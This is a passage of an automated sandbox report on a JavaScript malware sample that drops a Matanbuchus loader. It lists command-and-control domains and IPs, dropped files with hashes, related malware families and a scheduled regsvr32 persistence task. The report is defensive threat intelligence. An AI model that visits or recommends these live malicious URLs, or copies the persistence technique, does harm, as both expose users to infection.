                  C:\Windows\Installer\MSI6890.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI68B0.tmp | 0% | ReversingLabs | |

                  No Antivirus matches
                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  http://schemas.xml | 0% | Avira URL Cloud | safe |
                  https://security-patches.systems/AdminAccounts.aspx | 0% | Avira URL Cloud | safe |
                  https://security-patches.systems/verif.aspx | 0% | Avira URL Cloud | safe |
                  http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php | 0% | Avira URL Cloud | safe |
                  https://axizlhop.life/klog.php | 0% | Avira URL Cloud | safe |
                  https://security-patches.systems/ | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  axizlhop.life | 104.21.40.3 | true | false | | unknown
                  security-patches.systems | 185.234.216.175 | true | true | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  https://axizlhop.life/klog.php | false | Avira URL Cloud: safe | unknown
                  https://security-patches.systems/verif.aspx | true | Avira URL Cloud: safe | unknown
                  http://security-patches.systems/WinDefUpdates/DefenderUpdates/index.php | true | Avira URL Cloud: safe | unknown
                  https://security-patches.systems/AdminAccounts.aspx | true | Avira URL Cloud: safe | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://security-patches.systems/ | rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://schemas.xml | regsvr32.exe | false | Avira URL Cloud: safe | unknown

                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      185.234.216.175 | security-patches.systems | Poland | | 197226 | SPRINT-SDCPL | true
                      104.21.40.3 | axizlhop.life | United States | | 13335 | CLOUDFLARENETUS | false

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1570376
                      Start date and time:2024-12-06 22:18:45 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 52s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Without Instrumentation
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Doc_21-04-53.js
                      Detection:MAL
                      Classification:mal96.troj.evad.winJS@18/21@5/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: Doc_21-04-53.js

                      Time | Type | Description
                      16:19:38 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
                      16:20:06 | API Interceptor | 53x Sleep call for process: rundll32.exe modified
                      21:19:43 | Task Scheduler | Run new task: {9BDF816E-3AA5-4D58-9D2C-6A06AF9DE38B} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      185.234.216.175 | klog.php.msi | Get hash | malicious | Matanbuchus | Browse | security-patches.systems/WinDefUpdates/DefenderUpdates/index.php

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      security-patches.systems | klog.php.msi | Get hash | malicious | Matanbuchus | Browse | 185.234.216.175

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      SPRINT-SDCPL | klog.php.msi | Get hash | malicious | Matanbuchus | Browse | 185.234.216.175
                      CLOUDFLARENETUS | https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd | Get hash | malicious | Unknown | Browse | 104.21.16.114
                       | https://wrx.dzpvwobr.ru/ | Get hash | malicious | Unknown | Browse | 172.67.211.61
                       | https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t | Get hash | malicious | HTMLPhisher | Browse | 104.26.9.44
                       | https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KL | Get hash | malicious | Unknown | Browse | 104.18.95.41
                       | file.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.165.166
                       | https://t.ly/DDbri | Get hash | malicious | Unknown | Browse | 104.20.6.133
                       | file.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.16.9
                       | https://m0g9861wc1.execute-api.us-east-1.amazonaws.com/uyt/#alissa.bessette@eastwesttea.com | Get hash | malicious | HTMLPhisher, ReCaptcha Phish | Browse | 104.19.229.21
                       | https://hujalconcretos.com/npp | Get hash | malicious | Unknown | Browse | 104.18.11.207

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      28a2c9bd18a11de089ef85a160da29e4 | https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd | Get hash | malicious | Unknown | Browse | 104.21.40.3
                       | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 104.21.40.3
                       | https://wrx.dzpvwobr.ru/ | Get hash | malicious | Unknown | Browse | 104.21.40.3
                       | https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t | Get hash | malicious | HTMLPhisher | Browse | 104.21.40.3
                       | https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KL | Get hash | malicious | Unknown | Browse | 104.21.40.3
                       | https://t.ly/DDbri | Get hash | malicious | Unknown | Browse | 104.21.40.3
                       | https://inovamora.com/team/index.html | Get hash | malicious | HTMLPhisher | Browse | 104.21.40.3
                       | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 104.21.40.3
                       | file.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.40.3
                      37f463bf4616ecd445d4a1937da06e19 | klog.php.msi | Get hash | malicious | Matanbuchus | Browse | 185.234.216.175
                       | resume.docx.lnk | Get hash | malicious | Unknown | Browse | 185.234.216.175
                       | JSWunwO4rS.lnk | Get hash | malicious | LummaC Stealer | Browse | 185.234.216.175
                       | apilibx64.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 185.234.216.175
                       | Fortexternal.exe | Get hash | malicious | Unknown | Browse | 185.234.216.175
                       | Setup.msi | Get hash | malicious | Unknown | Browse | 185.234.216.175
                       | Document_PDF.vbs | Get hash | malicious | FormBook | Browse | 185.234.216.175
                       | Pr9cqW75nY.lnk | Get hash | malicious | Unknown | Browse | 185.234.216.175
                       | G3vWD786PN.lnk | Get hash | malicious | Unknown | Browse | 185.234.216.175

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      C:\Windows\Installer\MSI67E2.tmp | klog.php.msi | Get hash | malicious | Matanbuchus | Browse |
                       | fes.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse |
                       | zdi.txt.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse |
                       | merd.msi | Get hash | malicious | Unknown | Browse |
                       | medk.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse |
                       | lavi.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse |
                       | Document-v09-42-38.js | Get hash | malicious | BruteRatel | Browse |
                       | Document-v05-53-20.js | Get hash | malicious | BruteRatel, Latrodectus | Browse |
                       | FW3x3p4eZ5.msi | Get hash | malicious | Bazar Loader, BruteRatel | Browse |
                      C:\Users\user\AppData\Roaming\silver\libcurl.dll | klog.php.msi | Get hash | malicious | Matanbuchus | Browse |
                      C:\Users\user\8f08\813848\813848.winmd | klog.php.msi | Get hash | malicious | Matanbuchus | Browse |

                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1355
                                            Entropy (8bit):5.735918190779132
                                            Encrypted:false
                                            SSDEEP:24:hOg4BtTUTXNT6TYggmbtMpUvfUFPe9lW0DhiSVzDfvQsDpD6:USTQ0KstPID8SVf3lD6
                                            MD5:34358AD45A20C542A030786762B32831
                                            SHA1:852D966D2B6107A29C463E03DAB7BF6A5D0C7149
                                            SHA-256:7B9C7351BFDA95D36C6C44FAEED7C9EDD322F24CE94F3DB30E3BC7C728669CCD
                                            SHA-512:DDAF2C24E2DC75B68A06901C943C3ABE51B0312A3BFD7F44F6699AF74BE1A76870DCC28A237B320C094ACF29F85278429BA0F9FB086971F2FD53AB7B06E8AACC
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}.@........CreateFolders..Creating folders..Folder: [1]#.7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..&.C:\Users\user\AppData\Roaming\silver\....1.C:\Users\user\AppData\Roaming\silver\libcurl.dll....WriteRegistryValues..Writing system registry v
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):319488
                                            Entropy (8bit):6.566831510478186
                                            Encrypted:false
                                            SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                            MD5:AD47745AB2AEB60334491BA213BDCF73
                                            SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                            SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                                            SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\813848\813848.winmd, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):319488
                                            Entropy (8bit):6.566831510478186
                                            Encrypted:false
                                            SSDEEP:6144:l36YH14eJJkVRujDjVBBUUE5xN8PzTtSIgqbzJX3+uFrn:V6YVvJDj/VBU3N8uqRX3Brn
                                            MD5:AD47745AB2AEB60334491BA213BDCF73
                                            SHA1:8D8320BF0CC069F107D1EE3245D7F8BDFF7D3101
                                            SHA-256:394401B1205D1CC5E6AF1F25183941428651E8DE0E715C5E954E25C6E49D4371
                                            SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            • Filename: fes.msi, Detection: malicious, Browse
                                            • Filename: zdi.txt.msi, Detection: malicious, Browse
                                            • Filename: merd.msi, Detection: malicious, Browse
                                            • Filename: medk.msi, Detection: malicious, Browse
                                            • Filename: lavi.msi, Detection: malicious, Browse
                                            • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                            • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                            • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1727
                                            Entropy (8bit):5.5771999728476045
                                            Encrypted:false
                                            SSDEEP:24:hTg4BtTUTXNhu6SHfbopWzlzbastcZpUWfUFP37rPJG9Q1E7DcqvSDhiS/zAfgx2:FSTBNspz6mP3PUmE7aD8S/XDI
                                            MD5:FBF7DD5E54067A4B4984207068C3B00C
                                            SHA1:F0FE278CDC9EFCA773F4CA623C22DD4BA5432977
                                            SHA-256:CC62FC9F2EF2ACFB5425E6066B0AE812EA6C1A28424B5B0284CCFB7399483804
                                            SHA-512:20281BBDC46D753650494AF358D5A38C540DDB9A7CD614543A5ADF7F25423C20E8372A4F7CEC24ECE8F3E73EFF71A6C38BC756BDAD337981C803739F54747078
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB},.01:\Software\Blueray INC\ProSoftware\Version.@.......@.....@.....@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}1.C:\Users\user\AppData\Roaming\silver\libcurl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@.
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                            Category:dropped
                                            Size (bytes):978944
                                            Entropy (8bit):6.982712024960584
                                            Encrypted:false
                                            SSDEEP:12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
                                            MD5:18D5F1A9BFB3E34FF25BBDA3F05D386F
                                            SHA1:4B4394E1C8D91B4D7D1BEC0C4A443FA08243994F
                                            SHA-256:55A33165FBA0F7134E4CA482E0951C143B04E6A0E78FDC5F702E74E08BFD9249
                                            SHA-512:050747B91C89396A945E3A7E4BBE10F16CE2627D531DB087DDEF86817FBD9FD1C4E067D3CBB522380D2B1A5F50696797064A19E78DD5A8ABC5A35C03DBE843FE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
                                            SHA-256:FDB571430870B8A4BD95698B0EB4274E13F7CCCD2DFAB7BBF1698E7AFD8B9BA5
                                            SHA-512:0B42B77B3A7CECDF76F20744EF20EFB9D38A4213110720DC23492566F5E480E849B0555F92C9501381C069984999D7FCF69E7F0D6D6DF6F9C3282A901CA0A718
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):73728
                                            Entropy (8bit):0.1379041469651897
                                            Encrypted:false
                                            SSDEEP:48:fQgTeHOfDSCHOf6HOfDSCHOfdAECiCyoq9WuSi2R22x:GyHbyHvECkWWI
                                            MD5:8AFFEB4B56B67A79B6ECD797C357FC96
                                            SHA1:BB9BDE2C70CCBEDCA26A8175F12C9E2650675575
                                            SHA-256:E9851DA8B0285F5D2AF87E8A21984D01609C13ABC42FC642EC76F1F22869B202
                                            SHA-512:E65866F338DBC581091C7A3A25C893612E31938796921B344307E1C7B24E9775AF5A0F8FA981A8671A6E94BF27A78B59A25909DBEBED37183B1E2A121275807D
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
                                            SHA-256:FDB571430870B8A4BD95698B0EB4274E13F7CCCD2DFAB7BBF1698E7AFD8B9BA5
                                            SHA-512:0B42B77B3A7CECDF76F20744EF20EFB9D38A4213110720DC23492566F5E480E849B0555F92C9501381C069984999D7FCF69E7F0D6D6DF6F9C3282A901CA0A718
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
